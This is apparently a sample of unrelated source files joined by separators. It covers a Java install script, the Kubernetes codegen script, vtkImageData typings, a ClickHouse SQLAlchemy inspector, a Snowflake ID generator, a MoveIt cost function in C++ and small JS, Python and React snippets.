if [[ $JAVA_FILE == *.tar.gz ]]; then
echo -e "\n" | tar -zxf $JAVA_FILE
JAVA_NAME=`ls -1 $JAVA_TARGET_LOCATION | grep -v tar.gz`
chown -R root:root $JAVA_HOME
cat >> /etc/profile.d/java.sh <<EOF
# Custom Java install
export JAVA_HOME=$JAVA_TARGET_LOCATION/$JAVA_NAME
export PATH=\$PATH:$JAVA_TARGET_LOCATION/$JAVA_NAME/bin
EOF
case "$1" in
Ubuntu )
update-alternatives --install "/usr/bin/java" "java" "$JAVA_TARGET_LOCATION/$JAVA_NAME/bin/java" 1
update-alternatives --install "/usr/bin/javac" "javac" "$JAVA_TARGET_LOCATION/$JAVA_NAME/bin/javac" 1
update-alternatives --install "/usr/bin/javaws" "javaws" "$JAVA_TARGET_LOCATION/$JAVA_NAME/bin/javaws" 1
update-alternatives --set java $JAVA_TARGET_LOCATION/$JAVA_NAME/bin/java
update-alternatives --set javac $JAVA_TARGET_LOCATION/$JAVA_NAME/bin/javac
update-alternatives --set javaws $JAVA_TARGET_LOCATION/$JAVA_NAME/bin/javaws
;;
Fedora | RedHatEnterpriseServer | CentOS )
alternatives --install /usr/bin/java java $JAVA_TARGET_LOCATION/$JAVA_NAME/bin/java 200000
alternatives --install /usr/bin/javaws javaws $JAVA_TARGET_LOCATION/$JAVA_NAME/bin/javaws 200000
alternatives --install /usr/bin/javac javac $JAVA_TARGET_LOCATION/$JAVA_NAME/bin/javac 200000
alternatives --install /usr/bin/jar jar $JAVA_TARGET_LOCATION/$JAVA_NAME/bin/jar 200000
;;
esac
elif [[ $JAVA_FILE == *.bin ]]; then
echo -e "\n" | sh $JAVA_FILE
else
echo "Unknown file type: $JAVA_FILE, exiting"
exit 1
fi
rm $JAVA_FILE
|
<reponame>Ivaant/NodeTest
'use strict';
const person = (name, phone) => ({
name: name,
phone: phone,
});
// console.log(person('Marcus', '+380504560033'));
const phoneBook = [
person('Marcus','+380504727722'),
];
// console.log(phoneBook);
phoneBook.push(person('Iva', '+380405567788'));
phoneBook.push(person('Ant', '+380955507750'));
// console.log(phoneBook);
const findPhoneByName = (name) => {
for (const person of phoneBook) {
if (person.name === name) {
return person.phone;
}
}
};
// console.log(findPhoneByName('Marcus'));
const hashItem = (phoneItem) => ({
[phoneItem.name]: phoneItem.phone,
});
console.log(hashItem(phoneBook[0]));
|
#!/bin/bash
# Copyright 2014 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -o errexit
set -o nounset
set -o pipefail
KUBE_ROOT=$(dirname "${BASH_SOURCE}")/..
source "${KUBE_ROOT}/hack/lib/init.sh"
kube::golang::setup_env
BUILD_TARGETS=(
cmd/libs/go2idl/client-gen
cmd/libs/go2idl/set-gen
cmd/libs/go2idl/lister-gen
cmd/libs/go2idl/informer-gen
)
make -C "${KUBE_ROOT}" WHAT="${BUILD_TARGETS[*]}"
clientgen=$(kube::util::find-binary "client-gen")
setgen=$(kube::util::find-binary "set-gen")
listergen=$(kube::util::find-binary "lister-gen")
informergen=$(kube::util::find-binary "informer-gen")
# Please do not add any logic to this shell script. Add logic to the go code
# that generates the set-gen program.
#
GROUP_VERSIONS=(${KUBE_AVAILABLE_GROUP_VERSIONS})
GV_DIRS=()
for gv in "${GROUP_VERSIONS[@]}"; do
# add items, but strip off any leading apis/ you find to match command expectations
api_dir=$(kube::util::group-version-to-pkg-path "${gv}")
pkg_dir=${api_dir#apis/}
# skip groups that aren't being served, clients for these don't matter
if [[ " ${KUBE_NONSERVER_GROUP_VERSIONS} " == *" ${gv} "* ]]; then
continue
fi
GV_DIRS+=("${pkg_dir}")
done
# delimit by commas for the command
GV_DIRS_CSV=$(IFS=',';echo "${GV_DIRS[*]// /,}";IFS=$)
# This can be called with one flag, --verify-only, so it works for both the
# update- and verify- scripts.
${clientgen} "$@"
${clientgen} -t "$@"
${clientgen} --clientset-name="release_1_5" --input="${GV_DIRS_CSV}" "$@"
# Clientgen for federation clientset.
${clientgen} --clientset-name=federation_internalclientset --clientset-path=k8s.io/kubernetes/federation/client/clientset_generated --input="../../federation/apis/federation/","api/","extensions/" --included-types-overrides="api/Service,api/Namespace,extensions/ReplicaSet,api/Secret,extensions/Ingress,extensions/Deployment,extensions/DaemonSet,api/ConfigMap,api/Event" "$@"
${clientgen} --clientset-name=federation_release_1_5 --clientset-path=k8s.io/kubernetes/federation/client/clientset_generated --input="../../federation/apis/federation/v1beta1","api/v1","extensions/v1beta1" --included-types-overrides="api/v1/Service,api/v1/Namespace,extensions/v1beta1/ReplicaSet,api/v1/Secret,extensions/v1beta1/Ingress,extensions/v1beta1/Deployment,extensions/v1beta1/DaemonSet,api/v1/ConfigMap,api/v1/Event" "$@"
${setgen} "$@"
LISTERGEN_APIS=(
pkg/api
pkg/api/v1
$(
cd ${KUBE_ROOT}
find pkg/apis -name types.go | xargs -n1 dirname | sort
)
)
LISTERGEN_APIS=(${LISTERGEN_APIS[@]/#/k8s.io/kubernetes/})
LISTERGEN_APIS=$(IFS=,; echo "${LISTERGEN_APIS[*]}")
${listergen} --input-dirs "${LISTERGEN_APIS}" "$@"
INFORMERGEN_APIS=(
pkg/api
pkg/api/v1
$(
cd ${KUBE_ROOT}
# because client-gen doesn't do policy/v1alpha1, we have to skip it too
find pkg/apis -name types.go | xargs -n1 dirname | sort | grep -v pkg.apis.policy.v1alpha1
)
)
INFORMERGEN_APIS=(${INFORMERGEN_APIS[@]/#/k8s.io/kubernetes/})
INFORMERGEN_APIS=$(IFS=,; echo "${INFORMERGEN_APIS[*]}")
${informergen} \
--input-dirs "${INFORMERGEN_APIS}" \
--versioned-clientset-package k8s.io/kubernetes/pkg/client/clientset_generated/release_1_5 \
--internal-clientset-package k8s.io/kubernetes/pkg/client/clientset_generated/internalclientset \
--listers-package k8s.io/kubernetes/pkg/client/listers \
"$@"
# You may add additional calls of code generators like set-gen above.
# call generation on sub-project for now
cmd/kubernetes-discovery/hack/update-codegen.sh
|
#!/bin/bash
reportfailed()
{
echo "Script failed...exiting. ($*)" 1>&2
exit 255
}
export ORGCODEDIR="$(cd "$(dirname $(readlink -f "$0"))" && pwd -P)" || reportfailed
DATADIR="$ORGCODEDIR"
source "$ORGCODEDIR/simple-defaults-for-bashsteps.source"
mfff()
{
(
$starting_checks "Make t-fff"
cd "$DATADIR"
[ -f t-fff ]
$skip_rest_if_already_done; set -e
date >t-fff
) ; $prev_cmd_failed
}
(
$starting_dependents "Make t-ddd"
mfff
$starting_checks
cd "$DATADIR"
[ -f t-ddd ]
$skip_rest_if_already_done; set -e
date >t-ddd
) ; $prev_cmd_failed
(
$starting_dependents "Make t-eee"
mfff
$starting_checks
cd "$DATADIR"
[ -f t-eee ]
$skip_rest_if_already_done; set -e
date >t-eee
) ; $prev_cmd_failed
|
/**
* Asserts that a value is an instance of a given type.
*
* @param value The value to test.
* @param type The type of which value must be an instance.
*/
export function assertType<T>(value: any, type: new (...args: any) => T): T {
if (value instanceof type) {
return value as T;
}
throw new TypeError(
`Expected value of type: ${type} but got ${typeof value}`
);
}
/**
* Locates an instance of a given type within an array.
*
* @param container The array to search.
* @param type The type of which value must be an instance.
* @return The located value
* @throws {TypeError} if the value was not found or not of
*/
export function findInstanceOf<A, T extends A>(
container: A[],
type: new (...args: any) => T
) {
const value = container.find((v) => v instanceof type);
if (value !== undefined) {
return value as T;
}
throw new TypeError(`Array does not contain a value of type: ${type}`);
}
|
def calculate_square_root(n):
# Let `x` be the potential square root
x = n
# Initial value of a `small` number
small_number = 0.0000001
while (x - n/x > small_number):
x = (x + n/x)/2
return x
|
const password = document.getElementById("password");
const toggle = document.getElementById("toggle");
function showHide() {
if (password.type === "password") {
password.setAttribute("type", "text");
toggle.classList.add("hide");
} else {
password.setAttribute("type", "password");
toggle.classList.remove("hide");
}
}
const modal = document.querySelector(".modal");
const previews = document.querySelectorAll(".gallery img");
const original = document.querySelector(".full-img");
const caption = document.querySelector(".caption");
previews.forEach((preview) => {
modal.classList.add("open");
original.classList.add("open");
// Dynamyc change text and image
const originalSrc = preview.getAttribute("data-original");
original.src = `./full/${originalSrc}`;
const altText = preview.alt;
caption.textContent = altText;
});
modal.addEventListener("click", (e) => {
if (e.target.classList.contains("modal")) {
modal.classList.remove("open");
original.classList.remove("open");
}
});
|
<gh_stars>0
import ImageZoom from './src/image-zoom/image-zoom.component';
export default ImageZoom;
|
import { mat3, mat4, ReadonlyVec3, vec3 } from 'gl-matrix';
import { Bounds, Vector3 } from '../../../types';
import vtkDataSet, { IDataSetInitialValues } from '../DataSet';
/**
*
*/
export interface IImageDataInitialValues extends IDataSetInitialValues {
spacing?: number[];
origin?: number[];
extent?: number[];
}
interface IComputeHistogram {
minimum: number;
maximum: number;
average: number;
variance: number;
sigma: number;
}
export interface vtkImageData extends vtkDataSet {
/**
* Returns an object with `{ minimum, maximum, average, variance, sigma }`
* of the imageData points found within the provided `worldBounds`.
*
* `voxelFunc(index, bounds)` is an optional function that is called with
* the `[i,j,k]` index and index `bounds`, expected to return truthy if the
* data point should be counted in the histogram, and falsey if not.
* @param {Number[]} worldBounds The bounds of the world.
* @param [voxelFunc]
*/
computeHistogram(worldBounds: number[], voxelFunc?: any): IComputeHistogram;
/**
* Returns an `array[3]` of values to multiply an `[i,j,k]` index to convert
* into the actual data array index, from the provided extent.
* `numberOfComponents` should match the Scalar components.
* @internal
* @param {Number[]} extent
* @param {Number} [numberOfComponents]
*/
computeIncrements(extent: number[], numberOfComponents?: number): number[]
/**
* Converts an `[i,j,k]` index to the flat data array index. Returns `NaN`
* if any of the i,j,k bounds are outside the data Extent.
* @internal
* @param {Number[]} ijk The localized `[i,j,k]` pixel array position. Float values will be rounded.
* @return {Number} the corresponding flattened index in the scalar array
*/
computeOffsetIndex(ijk: number[]): number;
/**
* Calculates the `indexToWorld` and `worldToIndex` conversion matrices from
* the origin, direction, and spacing. Shouldn't need to call this as it is
* handled internally, and updated whenever the vtkImageData is modified.
* @internal
*/
computeTransforms(): void;
/**
* Returns a bounds array from a given Extent, useful if you need to
* calculate the world bounds of a subset of the imageData's data.
* @internal
* @param {Number[]} ex
*/
extentToBounds(ex: number[]): number[];
/**
* The Bounds of a vtkImage are returned as pairs of world coordinates
* ```[x_min, x_max, y_min, y_max, z_min, z_max]``` these are calculated
* from the Extent, Origin, and Spacing, defined
* through
* ```js
* bounds[6] =
* [
* i_min*Spacing[0] + Origin[0], i_max*Spacing[0] + Origin[0],
* j_min*Spacing[1] + Origin[1], j_max*Spacing[1] + Origin[1],
* k_min*Spacing[2] + Origin[2], k_max*Spacing[2] + Origin[2]
* ];
* ```
* You can't directly set the bounds. First you need to decide how many
* pixels across your image will be (i.e. what the extent should be), and
* then you must find the origin and spacing that will produce the bounds
* that you need from the extent that you have. This is simple algebra. In
* general, always set the extent to start at zero, e.g. `[0, 9, 0, 9, 0,
* 9]` for a 10x10x10 image. Calling `setDimensions(10,10,10)` does exactly
* the same thing as `setExtent(0,9,0,9,0,9)` but you should always do the
* latter to be explicit about where your extent starts.
* @return {Bounds} The bounds for the mapper.
*/
getBounds(): Bounds;
/**
* Get the `[x,y,z]` location of the center of the imageData.
*/
getCenter(): number[];
/**
* Get dimensions of this structured points dataset. It is the number of
* points on each axis. Dimensions are computed from Extents during this
* call.
*/
getDimensions(): number[];
/**
* Direction is a `mat3` matrix corresponding to the axes directions in
* world coordinates for the I, J, K axes of the image. Direction must form
* an orthonormal basis.
*/
getDirection(): mat3;
/**
* The maximal extent of the projection.
* @default [0, -1, 0, -1, 0, -1]
*/
getExtent(): number[];
/**
*
* @default [0, -1, 0, -1, 0, -1]
*/
getExtentByReference(): number[];
/**
* Returns the data array index for the point at the provided world position.
* @param {Number[]} xyz The [x,y,z] array in world coordinates.
* @return {number|NaN} the corresponding pixel's index in the scalar array.
*/
getOffsetIndexFromWorld(xyz: number[]): number;
/**
*
*/
getNumberOfCells(): number;
/**
* Get the number of points composing the dataset.
*/
getNumberOfPoints(): number;
/**
* Get the world position of a data point. Index is the point's index in the
* 1D data array.
* @param index
*/
getPoint(index: number): number[];
/**
* Get the origin of the dataset. The origin is the position in world
* coordinates of the point of extent (0,0,0). This point does not have to
* be part of the dataset, in other words, the dataset extent does not have
* to start at (0,0,0) and the origin can be outside of the dataset bounding
* box. The origin plus spacing determine the position in space of the
* points.
*/
getOrigin(): number[];
/**
* Get the origin of the dataset. The origin is the position in world
*/
getOriginByReference(): number[];
/**
* Returns the scalar value for the point at the provided world position, or
* `NaN` if the world bounds are outside the volumeData bounds. `comp` is
* the scalar component index, for multi-component scalar data.
* @param {Number[]} xyz The [x,y,z] array in world coordinates.
* @param {Number} [comp] The scalar component index for multi-component scalars.
* @return {number|NaN} The corresponding pixel's scalar value.
*/
getScalarValueFromWorld(xyz: number[], comp?: number): number;
/**
* Set the spacing [width, height, length] of the cubical cells that compose
* the data set.
*/
getSpacing(): number[];
/**
*
*/
getSpacingByReference(): number[];
/**
* Returns the `mat4` matrices used to convert between world and index.
* `worldToIndex` is the inverse matrix of `indexToWorld`. Both are made
* with `Float64Array`.
*/
getIndexToWorld(): mat4;
/**
* Returns the `mat4` matrices used to convert between world and index.
* `worldToIndex` is the inverse matrix of `indexToWorld`. Both are made
* with `Float64Array`.
*/
getWorldToIndex(): mat4;
/**
* this is the fast version, requires vec3 arguments
* @param {ReadonlyVec3} vin
* @param {vec3} vout
*/
indexToWorldVec3(vin: ReadonlyVec3, vout: vec3): vec3;
/**
* Converts the input index vector `[i,j,k]` to world values `[x,y,z]`.
* Modifies the out vector array in place, but also returns it.
* @param {ReadonlyVec3} ain
* @param {vec3} aout
*/
indexToWorld(ain: ReadonlyVec3, aout: vec3): vec3;
/**
* Calculate the corresponding world bounds for the given index bounds
* `[i_min, i_max, j_min, j_max, k_min, k_max]`. Modifies `out` in place if
* provided, or returns a new array.
* @param {Number[]} bin
* @param {Number[]} [bout]
*/
indexToWorldBounds(bin: number[], bout?: number[]): number[];
/**
* Set the values of the extent, from `0` to `(i-1)`, etc.
* @param dims
*/
setDimensions(dims: number[]): void;
/**
* Set the values of the extent, from `0` to `(i-1)`, etc.
* @param i
* @param j
* @param k
*/
setDimensions(i: number, j: number, k: number): void;
/**
* The direction matrix is a 3x3 basis for the I, J, K axes
* of the image. The rows of the matrix correspond to the
* axes directions in world coordinates. Direction must
* form an orthonormal basis, results are undefined if
* it is not.
* @param {mat3} direction
*/
setDirection(direction: mat3): boolean;
/**
* The direction matrix is a 3x3 basis for the I, J, K axes
* of the image. The rows of the matrix correspond to the
* axes directions in world coordinates. Direction must
* form an orthonormal basis, results are undefined if
* it is not.
* @param e00
* @param e01
* @param e02
* @param e10
* @param e11
* @param e12
* @param e20
* @param e21
* @param e22
*/
setDirection(e00: number, e01: number, e02: number, e10: number, e11: number, e12: number, e20: number, e21: number, e22: number): boolean;
/**
* Set the extent.
* @param extent
*/
setExtent(extent: number[]): boolean;
/**
*
* @param {Number} x1 The x coordinate of the first point.
* @param {Number} x2 The x coordinate of the second point.
* @param {Number} y1 The y coordinate of the first point.
* @param {Number} y2 The y coordinate of the second point.
* @param {Number} z1 The z coordinate of the first point.
* @param {Number} z2 The z coordinate of the second point.
*/
setExtent(x1: number, x2: number, y1: number, y2: number, z1: number, z2: number): void;
/**
* Set the origin of the image.
* @param {Vector3} origin The coordinate of the origin point.
*/
setOrigin(origin: Vector3): boolean;
/**
* Set the origin of the image.
* @param {Vector3} origin The coordinate of the origin point.
*/
setOriginFrom(origin: Vector3): boolean;
/**
*
* @param spacing
*/
setSpacing(spacing: number[]): boolean;
/**
*
* @param spacing
*/
setSpacingFrom(spacing: number[]): boolean;
/**
* this is the fast version, requires vec3 arguments
* @param vin
* @param vout
*/
worldToIndexVec3(vin: ReadonlyVec3, vout: vec3): vec3;
/**
* Converts the input world vector `[x,y,z]` to approximate index values
* `[i,j,k]`. Should be rounded to integers before attempting to access the
* index. Modifies the out vector array in place, but also returns it.
* @param ain
* @param aout
*/
worldToIndex(ain: ReadonlyVec3, aout: vec3): vec3;
/**
* Calculate the corresponding index bounds for the given world bounds
* `[x_min, x_max, y_min, y_max, z_min, z_max]`. Modifies `out` in place if
* provided, or returns a new array.
* @param {Number[]} bin
* @param {Number[]} [bout]
*/
worldToIndexBounds(bin: number[], bout?: number[]): number[];
}
/**
* Method used to decorate a given object (publicAPI+model) with vtkImageData characteristics.
*
* @param publicAPI object on which methods will be bounds (public)
* @param model object on which data structure will be bounds (protected)
* @param {IImageDataInitialValues} [initialValues] (default: {})
*/
export function extend(publicAPI: object, model: object, initialValues?: IImageDataInitialValues): void;
/**
* Method used to create a new instance of vtkImageData.
* @param {IImageDataInitialValues} [initialValues] for pre-setting some of its content
*/
export function newInstance(initialValues?: IImageDataInitialValues): vtkImageData;
/**
* vtkImageData is a data object that is a concrete implementation of
* vtkDataSet. vtkImageData represents a geometric structure that is a
* topological and geometrical regular array of points. Examples include volumes
* (voxel data) and pixmaps. All vtkDataSet functions are inherited.
*/
export declare const vtkImageData: {
newInstance: typeof newInstance,
extend: typeof extend,
};
export default vtkImageData;
|
<reponame>Fozar/clickhouse-sqlalchemy
from sqlalchemy.engine import reflection
from clickhouse_sqlalchemy import Table, engines
class ClickHouseInspector(reflection.Inspector):
def reflect_table(self, table, *args, **kwargs):
# This check is necessary to support direct instantiation of
# `clickhouse_sqlalchemy.Table` and then reflection of it.
if not isinstance(table, Table):
table.metadata.remove(table)
ch_table = Table._make_from_standard(
table, _extend_on=kwargs.get('_extend_on')
)
else:
ch_table = table
super(ClickHouseInspector, self).reflect_table(
ch_table, *args, **kwargs
)
with self._operation_context() as conn:
schema = conn.schema_for_object(ch_table)
self._reflect_engine(ch_table.name, schema, ch_table)
def _reflect_engine(self, table_name, schema, table):
should_reflect = (
self.dialect.supports_engine_reflection and
self.dialect.engine_reflection
)
if not should_reflect:
return
engine_cls_by_name = {e.__name__: e for e in engines.__all__}
e = self.get_engine(table_name, schema=table.schema)
if not e:
raise ValueError("Cannot find engine for table '%s'" % table_name)
engine_cls = engine_cls_by_name.get(e['engine'])
if engine_cls is not None:
engine = engine_cls.reflect(table, **e)
engine._set_parent(table)
else:
table.engine = None
def get_engine(self, table_name, schema=None, **kw):
with self._operation_context() as conn:
return self.dialect.get_engine(
conn, table_name, schema=schema, info_cache=self.info_cache,
**kw
)
|
package com.ordernumber.service.impl;
import java.text.SimpleDateFormat;
import java.util.Date;
/**
* Twitter_Snowflake<br>
* SnowFlake改进符合业务的结构如下(每部分用-分开):<br>
* bizCode(业务代码) + 201805051212(日期) + 4096(毫秒内随机数)<br>
*/
/****
* @ClassName: SnowflakeIdWorker
* @Description: TODO(这里用一句话描述这个类的作用)
* @author ccc520
* @date 2018年6月5日 上午8:44:27
* @modificationHistory===============逻辑或功能性重大变更记录
* @modify by user: (修改人)
* @modify by reason: (修改原因)
*/
public class SnowflakeIdVariant {
// ==============================Fields===========================================
/** 序列在id中占的位数 */
private final long sequenceBits = 12L;
/** 生成序列的掩码,这里为4095 (0b111111111111=0xfff=4095) */
private final long sequenceMask = -1L ^ (-1L << sequenceBits);
/** 毫秒内序列(0~4095) */
private long sequence = 0L;
/** 上次生成ID的时间截 */
private long lastTimestamp = -1L;
private static ThreadLocal<SimpleDateFormat> threadLocal = new ThreadLocal<SimpleDateFormat>() {
@Override
protected SimpleDateFormat initialValue() {
return new SimpleDateFormat("yyyyMMddhhmmssSSS");
}
};
//==============================Constructors=====================================
/**
* 构造函数
*/
public SnowflakeIdVariant() {}
// ==============================Methods==========================================
/**
* 获得下一个ID (该方法是线程安全的)
* @return SnowflakeId
*/
public synchronized String nextId(String machineId, String bizCode) {
long timestamp = timeGen();
//如果当前时间小于上一次ID生成的时间戳,说明系统时钟回退过这个时候应当抛出异常
if (timestamp < lastTimestamp) {
throw new RuntimeException(
String.format("Clock moved backwards. Refusing to generate id for %d milliseconds", lastTimestamp - timestamp));
}
//如果是同一时间生成的,则进行毫秒内序列
if (lastTimestamp == timestamp) {
sequence = (sequence + 1) & sequenceMask;
//毫秒内序列溢出
if (sequence == 0) {
//阻塞到下一个毫秒,获得新的时间戳
timestamp = tilNextMillis(lastTimestamp);
}
}
//时间戳改变,毫秒内序列重置
else {
sequence = 0L;
}
//上次生成ID的时间截
lastTimestamp = timestamp;
//移位并通过或运算拼到一起组成64位的ID
return bizCode + machineId + (threadLocal.get().format(new Date(timestamp))) + sequence;
}
/**
* 阻塞到下一个毫秒,直到获得新的时间戳
* @param lastTimestamp 上次生成ID的时间截
* @return 当前时间戳
*/
protected long tilNextMillis(long lastTimestamp) {
long timestamp = timeGen();
while (timestamp <= lastTimestamp) {
timestamp = timeGen();
}
return timestamp;
}
/**
* 返回以毫秒为单位的当前时间
* @return 当前时间(毫秒)
*/
protected long timeGen() {
return System.currentTimeMillis();
}
//==============================Test=============================================
/** 测试 */
public static void main(String[] args) throws InterruptedException {
SnowflakeIdVariant idWorker = new SnowflakeIdVariant();
long time1 = System.currentTimeMillis();
for (int i = 0; i < 100000; i++) {
String id = idWorker.nextId("001","ORC");
//Thread.sleep(1);
System.out.println(id);
}
System.out.println(System.currentTimeMillis()-time1);
}
}
|
<gh_stars>0
/**
* @file tool_goal_pose.cpp
* @brief This defines a cost function for tool goal pose.
*
* @author <NAME>
* @date June 2, 2016
* @version TODO
* @bug No known bugs
*
* @copyright Copyright (c) 2016, Southwest Research Institute
*
* @par License
* Software License Agreement (Apache License)
* @par
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* @par
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <math.h>
#include <stomp_plugins/cost_functions/tool_goal_pose.h>
#include <XmlRpcException.h>
#include <pluginlib/class_list_macros.h>
#include <ros/console.h>
PLUGINLIB_EXPORT_CLASS(stomp_moveit::cost_functions::ToolGoalPose,stomp_moveit::cost_functions::StompCostFunction);
static const int CARTESIAN_DOF_SIZE = 6;
static const double DEFAULT_POS_TOLERANCE = 0.001;
static const double DEFAULT_ROT_TOLERANCE = 0.01;
static const double POS_MAX_ERROR_RATIO = 10.0;
static const double ROT_MAX_ERROR_RATIO = 10.0;
namespace stomp_moveit
{
namespace cost_functions
{
ToolGoalPose::ToolGoalPose():
name_("ToolGoalPose")
{
// TODO Auto-generated constructor stub
}
ToolGoalPose::~ToolGoalPose()
{
// TODO Auto-generated destructor stub
}
bool ToolGoalPose::initialize(moveit::core::RobotModelConstPtr robot_model_ptr,
const std::string& group_name,XmlRpc::XmlRpcValue& config)
{
group_name_ = group_name;
robot_model_ = robot_model_ptr;
return configure(config);
}
bool ToolGoalPose::configure(const XmlRpc::XmlRpcValue& config)
{
using namespace XmlRpc;
try
{
XmlRpcValue params = config;
position_cost_weight_ = static_cast<double>(params["position_cost_weight"]);
orientation_cost_weight_ = static_cast<double>(params["orientation_cost_weight"]);
// total weight
cost_weight_ = position_cost_weight_ + orientation_cost_weight_;
}
catch(XmlRpc::XmlRpcException& e)
{
ROS_ERROR("%s failed to load parameters, %s",getName().c_str(),e.getMessage().c_str());
return false;
}
return true;
}
bool ToolGoalPose::setMotionPlanRequest(const planning_scene::PlanningSceneConstPtr& planning_scene,
const moveit_msgs::MotionPlanRequest &req,
const stomp_core::StompConfiguration &config,
moveit_msgs::MoveItErrorCodes& error_code)
{
using namespace Eigen;
using namespace moveit::core;
const JointModelGroup* joint_group = robot_model_->getJointModelGroup(group_name_);
int num_joints = joint_group->getActiveJointModels().size();
tool_link_ = joint_group->getLinkModelNames().back();
state_.reset(new RobotState(robot_model_));
robotStateMsgToRobotState(req.start_state,*state_);
const std::vector<moveit_msgs::Constraints>& goals = req.goal_constraints;
if(goals.empty())
{
ROS_ERROR("A goal constraint was not provided");
error_code.val = error_code.INVALID_GOAL_CONSTRAINTS;
return false;
}
// storing tool goal pose
bool found_goal = false;
for(const auto& g: goals)
{
if(utils::kinematics::isCartesianConstraints(g))
{
// tool cartesian goal data
state_->updateLinkTransforms();
Eigen::Affine3d start_tool_pose = state_->getGlobalLinkTransform(tool_link_);
boost::optional<moveit_msgs::Constraints> cartesian_constraints = utils::kinematics::curateCartesianConstraints(g,start_tool_pose);
if(cartesian_constraints.is_initialized())
{
found_goal = utils::kinematics::decodeCartesianConstraint(robot_model_,cartesian_constraints.get(),tool_goal_pose_,
tool_goal_tolerance_,robot_model_->getRootLinkName());
ROS_DEBUG_STREAM("ToolGoalTolerance cost function will use tolerance: "<<tool_goal_tolerance_.transpose());
}
break;
}
if(!found_goal)
{
ROS_DEBUG("%s a cartesian goal pose in MotionPlanRequest was not provided,calculating it from FK",getName().c_str());
// check joint constraints
if(g.joint_constraints.empty())
{
ROS_ERROR_STREAM("No joint values for the goal were found");
error_code.val = error_code.INVALID_GOAL_CONSTRAINTS;
return false;
}
// compute FK to obtain tool pose
const std::vector<moveit_msgs::JointConstraint>& joint_constraints = g.joint_constraints;
// copying goal values into state
for(auto& jc: joint_constraints)
{
state_->setVariablePosition(jc.joint_name,jc.position);
}
// storing tool goal pose and tolerance
state_->update(true);
tool_goal_pose_ = state_->getGlobalLinkTransform(tool_link_);
tool_goal_tolerance_.resize(CARTESIAN_DOF_SIZE);
double ptol = DEFAULT_POS_TOLERANCE;
double rtol = DEFAULT_ROT_TOLERANCE;
tool_goal_tolerance_ << ptol, ptol, ptol, rtol, rtol, rtol;
found_goal = true;
break;
}
}
// setting cartesian error range
min_twist_error_ = tool_goal_tolerance_;
max_twist_error_.resize(min_twist_error_.size());
max_twist_error_.head(3) = min_twist_error_.head(3)*POS_MAX_ERROR_RATIO;
max_twist_error_.tail(3) = min_twist_error_.tail(3)*ROT_MAX_ERROR_RATIO;
return true;
}
bool ToolGoalPose::computeCosts(const Eigen::MatrixXd& parameters,
std::size_t start_timestep,
std::size_t num_timesteps,
int iteration_number,
int rollout_number,
Eigen::VectorXd& costs,
bool& validity)
{
using namespace Eigen;
using namespace utils::kinematics;
validity = true;
auto compute_scaled_error = [](const VectorXd& val,VectorXd& min,VectorXd& max) -> VectorXd
{
VectorXd capped_val;
capped_val = (val.array() > max.array()).select(max,val);
capped_val = (val.array() < min.array()).select(min,val);
auto range = max - min;
VectorXd scaled = (capped_val - min).array()/(range.array());
return scaled;
};
last_joint_pose_ = parameters.rightCols(1);
state_->setJointGroupActivePositions(group_name_,last_joint_pose_);
state_->updateLinkTransforms();
last_tool_pose_ = state_->getGlobalLinkTransform(tool_link_);
// computing twist error
Eigen::Affine3d tf = tool_goal_pose_.inverse() * last_tool_pose_;
Eigen::Vector3d angles_err = tf.rotation().eulerAngles(2,1,0);
angles_err.reverseInPlace();
Eigen::Vector3d pos_err = tool_goal_pose_.translation() - last_tool_pose_.translation();
tool_twist_error_.resize(6);
tool_twist_error_.head(3) = pos_err.head(3);
tool_twist_error_.tail(3) = angles_err.tail(3);
// computing relative error values
VectorXd scaled_twist_error = compute_scaled_error(tool_twist_error_,min_twist_error_,max_twist_error_);
double pos_error = scaled_twist_error.head(3).cwiseAbs().maxCoeff();
double orientation_error = scaled_twist_error.tail(3).cwiseAbs().maxCoeff();
// computing cost of last point
costs.resize(parameters.cols());
costs.setConstant(0.0);
costs(costs.size()-1) = pos_error*position_cost_weight_ + orientation_error * orientation_cost_weight_;
// check if valid when twist errors are below the allowed tolerance.
validity = (tool_twist_error_.cwiseAbs().array() <= tool_goal_tolerance_.array()).all();
return true;
}
void ToolGoalPose::done(bool success,int total_iterations,double final_cost,const Eigen::MatrixXd& parameters)
{
ROS_DEBUG_STREAM(getName()<<" last tool error: "<<tool_twist_error_.transpose());
ROS_DEBUG_STREAM(getName()<<" used tool tolerance: "<<tool_goal_tolerance_.transpose());
ROS_DEBUG_STREAM(getName()<<" last joint position: "<<last_joint_pose_.transpose());
}
} /* namespace cost_functions */
} /* namespace stomp_moveit */
|
package gb.esac.tools;
import gb.esac.timeseries.TimeSeries;
import gb.esac.timeseries.TimeSeriesMaker;
import gb.esac.timeseries.TimeSeriesUtils;
public class TestDataUtils {
public static void testFillGaps() throws Exception {
TimeSeries ts = (TimeSeries) TimeSeriesMaker.makeTimeSeries("lc7.qdp");
ts.writeCountsAsQDP("lc-gaps.qdp");
ts = TimeSeriesUtils.fillGaps(ts);
ts.writeCountsAsQDP("lc-noGaps.qdp");
}
public static void main(String[] args) throws Exception {
testFillGaps();
}
}
|
import React from 'react';
import { WRAP_NEAR_CONTRACT_ID } from '~services/wrap-near';
import { TokenMetadata } from '../../services/ft-contract';
import Token from './Token';
interface TokenListProps {
tokens: TokenMetadata[];
onClick?: (token: TokenMetadata) => void;
render?: (token: TokenMetadata) => React.ReactElement;
calledBy?: string;
}
export default function TokenList({
tokens,
onClick,
render,
calledBy,
}: TokenListProps) {
const tokenElements = tokens.map(
(token) =>
((token.id != WRAP_NEAR_CONTRACT_ID && calledBy === 'deposit') ||
calledBy != 'deposit') && (
<div className="text-xs font-semibold" key={token.id} title={token.id}>
<Token token={token} onClick={onClick} render={render} />
</div>
)
);
return <div className="divide-y">{tokenElements}</div>;
}
|
<filename>src/pages/about-me.js
import React from 'react';
import { Link } from 'gatsby';
import styled, { css } from 'styled-components';
import Layout from '../components/layout';
import SEO from '../components/seo';
